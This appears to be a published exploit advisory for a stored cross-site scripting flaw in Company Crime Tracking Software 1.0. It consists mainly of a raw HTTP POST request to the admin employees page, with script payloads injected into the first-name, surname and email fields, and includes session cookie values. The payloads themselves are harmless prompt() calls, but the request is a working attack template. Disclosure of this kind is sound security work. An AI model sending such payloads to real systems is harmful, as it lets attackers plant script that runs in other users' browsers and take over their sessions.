Company Crime Tracking Software version 1.0 suffers from a persistent cross site scripting vulnerability.
38b46c6d01aa66cf4ed8d3c2193f1e65# Exploit Title: Company Crime Tracknig Software | 'fname,surname,email' Stored Cross Site Scripting
# Exploit Author: Richard Jones
# Date: 01-04-2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/12644/company-crime-tracking-system.html
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
POST /caaz/admin/a_employees.php HTTP/1.1
Host: TARGET
Content-Type: multipart/form-data; boundary=---------------------------297905141828527091333499064608
Content-Length: 1010
Cookie: SSESSaca5a63f4c2fc739381fab7741d68783=xVaP07jLGdxx_p3Qsv1qO_3duBIN1XqSJKxxD4hJFkA; PHPSESSID=347sjf013j8s1blsuvsa32hr7r
----------------- snip----------------
-----------------------------297905141828527091333499064608
Content-Disposition: form-data; name="fname"
<script>prompt(1)</script>
-----------------------------297905141828527091333499064608
Content-Disposition: form-data; name="surname"
<script>prompt(2)</script>
-----------------------------297905141828527091333499064608
Content-Disposition: form-data; name="email"
[email protected]<script>prompt(4)</script>
----------------- snip----------------